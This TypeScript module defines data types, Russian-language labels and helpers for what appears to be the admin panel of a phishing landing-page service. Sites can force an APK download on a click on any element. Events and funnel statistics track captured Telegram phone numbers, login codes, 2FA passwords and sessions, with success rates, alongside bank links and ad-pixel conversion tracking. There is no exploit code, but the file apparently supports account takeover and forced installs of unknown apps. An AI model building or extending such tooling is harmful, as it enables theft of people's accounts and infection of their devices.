export type LandingDomainStatus = 'waiting_dns' | 'online' | 'error' | 'disabled';

export type LandingEventType =
	| 'connect'
	| 'download'
	| 'form_submit'
	| 'telegram_auth_start'
	| 'telegram_auth_code'
	| 'telegram_auth_password'
	| 'telegram_auth_session';

export type MetaPixelConversionEvent = 'lead' | 'subscribe' | 'purchase';

export interface ILandingDomain {
	id: number;
	zoneName: string;
	status: LandingDomainStatus;
	nsRecords?: string[];
	errorMessage?: string | null;
	createdAt: string;
	sitesCount?: number;
	linksCount?: number;
}

export type LandingSiteMode = 'apk' | 'telegram';

export type LandingDownloadTrigger = 'cta' | 'buttons' | 'any_click';

export const LANDING_DOWNLOAD_TRIGGER_OPTIONS: ReadonlyArray<{
	value: LandingDownloadTrigger;
	label: string;
}> = [
	{ value: 'cta', label: 'Скачивание APK на некоторые кнопки' },
	{ value: 'buttons', label: 'Скачивание APK на каждую кнопку' },
	{ value: 'any_click', label: 'Скачивание APK при клике на любой элемент' },
];

export function formatLandingDownloadTriggerLabel(
	trigger: LandingDownloadTrigger | undefined,
): string {
	const value = trigger ?? 'cta';
	return LANDING_DOWNLOAD_TRIGGER_OPTIONS.find(option => option.value === value)?.label ?? value;
}

export interface ILandingSiteConfig {
	mode?: LandingSiteMode;
	/** Per-site kill switch for telegram-auth template (default true). */
	telegramAuthEnabled?: boolean;
}

export interface ILandingSite {
	id: number;
	domainId: number;
	subdomain: string;
	fullHostname: string;
	templateSlug: string;
	config?: ILandingSiteConfig;
	createdAt: string;
}

export interface ILandingTemplateSiteConfig {
	mode?: {
		required?: boolean;
		options?: LandingSiteMode[];
	};
}

export type LandingCustomTemplateKind = 'apk' | 'telegram_auth';

export interface ILandingTemplate {
	slug: string;
	title: string;
	source?: 'builtin' | 'custom';
	templateKind?: LandingCustomTemplateKind;
	customTemplateId?: number;
	siteConfig?: ILandingTemplateSiteConfig;
}

export interface ILandingCustomTemplate {
	id: number;
	slug: string;
	title: string;
	entry: string;
	kind?: LandingCustomTemplateKind;
	createdAt: string;
}

export interface ILandingMetaPixel {
	id: number;
	name: string;
	pixelId: string;
	conversionEvent: MetaPixelConversionEvent;
	createdAt: string;
	updatedAt: string;
}

export interface ILandingLinkMetaPixel {
	id: number | null;
	name: string;
	pixelId: string;
	conversionEvent: MetaPixelConversionEvent;
}

export interface ILandingLink {
	id: string;
	siteId: number;
	templateSlug: string;
	buildId: string | null;
	tgUrl?: string | null;
	downloadTrigger?: LandingDownloadTrigger;
	url: string;
	metaPixel?: ILandingLinkMetaPixel | null;
	expiresAt?: string | null;
	createdAt: string;
}

export interface ILandingBankLink {
	bank: string;
	id: string;
	url: string;
}

export interface ILandingLinkCreated extends ILandingLink {
	relatedLinks?: string[];
	bankLinks?: ILandingBankLink[];
}

export interface ILandingLinkPatched extends ILandingLink {
	updatedLinkIds: string[];
}

export interface ILandingUploadedBuild {
	buildId: string;
	appName: string | null;
	apkFileName: string;
	source: 'upload';
	syncedAt: string;
	createdAt: string;
}

export interface ILandingEvent {
	id: string;
	linkId: string;
	type: LandingEventType;
	ip?: string | null;
	countryCode?: string | null;
	meta?: Record<string, unknown>;
	createdAt: string;
}

export interface ILandingEventAggregates {
	connect?: number;
	download?: number;
	form_submit?: number;
	telegram_auth_start?: number;
	telegram_auth_code?: number;
	telegram_auth_password?: number;
	telegram_auth_session?: number;
}

export interface ILandingEventTypeCounts {
	connect: number;
	download: number;
	form_submit: number;
	telegram_auth_start: number;
	telegram_auth_code: number;
	telegram_auth_password: number;
	telegram_auth_session: number;
}

const LANDING_EVENT_COUNT_KEYS: Array<keyof ILandingEventTypeCounts> = [
	'connect',
	'download',
	'form_submit',
	'telegram_auth_start',
	'telegram_auth_code',
	'telegram_auth_password',
	'telegram_auth_session',
];

export function normalizeLandingEventTypeCounts(
	raw: Partial<ILandingEventTypeCounts> | undefined,
): ILandingEventTypeCounts {
	const counts = {} as ILandingEventTypeCounts;
	for (const key of LANDING_EVENT_COUNT_KEYS) {
		counts[key] = raw?.[key] ?? 0;
	}
	return counts;
}

export function sumLandingEventTypeCounts(counts: Partial<ILandingEventTypeCounts>): number {
	return LANDING_EVENT_COUNT_KEYS.reduce((sum, key) => sum + (counts[key] ?? 0), 0);
}

export interface ILandingEventTimePoint extends ILandingEventTypeCounts {
	label: string;
}

export interface ILandingTelegramAuthFunnelCounts {
	starts: number;
	sessions: number;
	codeAttempts: number;
	codeSuccess: number;
	codeFailed: number;
	passwordAttempts: number;
	passwordSuccess: number;
	passwordFailed: number;
	awaitingPassword: number;
	sessionFromStart: number | null;
	codeSuccessRate: number | null;
	passwordSuccessRate: number | null;
}

export interface ILandingTelegramAuthFunnelRow {
	name: string;
	count: number;
	rateFromStart: number;
	rateFromPrev: number | null;
}

export interface ILandingTelegramAuthTimePoint {
	label: string;
	starts: number;
	sessions: number;
	codeSuccess: number;
	codeFailed: number;
}

export interface ILandingTelegramAuthStats {
	totals: ILandingTelegramAuthFunnelCounts;
	allTime: { totals: ILandingTelegramAuthFunnelCounts };
	funnel: ILandingTelegramAuthFunnelRow[];
	overTime: ILandingTelegramAuthTimePoint[];
}

export interface ILandingEventStats {
	period: 'day' | 'week' | 'month' | 'all';
	range: { from: string | null; to: string };
	totals: ILandingEventTypeCounts;
	allTime: ILandingEventTypeCounts;
	eventsOverTime: ILandingEventTimePoint[];
	telegramAuth: ILandingTelegramAuthStats;
}

export type LandingEventVisitOutcome = 'success' | 'error' | 'pending' | null;

export interface ILandingEventVisitSummary {
	hasStart: boolean;
	hasSession: boolean;
	phoneMasked: string | null;
	lastOutcome: LandingEventVisitOutcome;
}

export interface ILandingEventVisit {
	linkId: string;
	ip: string;
	startedAt: string;
	lastActivityAt: string;
	summary: ILandingEventVisitSummary;
	events: ILandingEvent[];
}

export function sumClassicLandingEventCounts(counts: Partial<ILandingEventTypeCounts>): number {
	return (counts.connect ?? 0) + (counts.download ?? 0) + (counts.form_submit ?? 0);
}

export const LANDING_DOMAIN_STATUS_LABELS: Record<LandingDomainStatus, string> = {
	waiting_dns: 'Ожидание DNS',
	online: 'Онлайн',
	error: 'Ошибка',
	disabled: 'Отключён',
};

export const LANDING_EVENT_TYPE_LABELS: Record<LandingEventType, string> = {
	connect: 'Подключение',
	download: 'Скачивание',
	form_submit: 'Форма',
	telegram_auth_start: 'TG: номер',
	telegram_auth_code: 'TG: код',
	telegram_auth_password: 'TG: 2FA',
	telegram_auth_session: 'TG: сессия',
};

export const META_PIXEL_CONVERSION_EVENT_LABELS: Record<MetaPixelConversionEvent, string> = {
	lead: 'Lead',
	subscribe: 'Subscribe',
	purchase: 'Purchase',
};

export const META_PIXEL_ID_PATTERN = /^\d{5,20}$/;

export function validateMetaPixelInput(input: {
	name: string;
	pixelId: string;
}): { ok: true } | { ok: false; message: string } {
	const name = input.name.trim();
	const pixelId = input.pixelId.trim();

	if (!name) {
		return { ok: false, message: 'Укажите название пикселя' };
	}
	if (name.length > 64) {
		return { ok: false, message: 'Название не должно превышать 64 символа' };
	}
	if (!pixelId) {
		return { ok: false, message: 'Укажите Pixel ID' };
	}
	if (!META_PIXEL_ID_PATTERN.test(pixelId)) {
		return { ok: false, message: 'Pixel ID: только цифры, от 5 до 20 символов' };
	}

	return { ok: true };
}

export function formatMetaPixelOptionLabel(pixel: Pick<ILandingMetaPixel, 'name' | 'conversionEvent'>): string {
	return `${pixel.name} · ${META_PIXEL_CONVERSION_EVENT_LABELS[pixel.conversionEvent]}`;
}

export function getLandingDomainStatusLabel(status: LandingDomainStatus): string {
	return LANDING_DOMAIN_STATUS_LABELS[status];
}
